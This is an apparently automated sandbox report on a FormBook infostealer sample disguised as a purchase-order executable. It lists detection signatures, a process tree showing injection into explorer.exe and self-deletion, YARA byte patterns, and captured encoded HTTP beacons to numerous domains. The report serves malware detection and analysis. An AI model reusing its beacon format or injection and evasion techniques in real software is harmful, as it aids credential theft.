Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321097
MD5:4142c1713da2f4f94bec71bfed46587b
SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Purchase Order 40,7045$.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%Perma Link
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.handsfreedocs.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://yuyabo.com/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
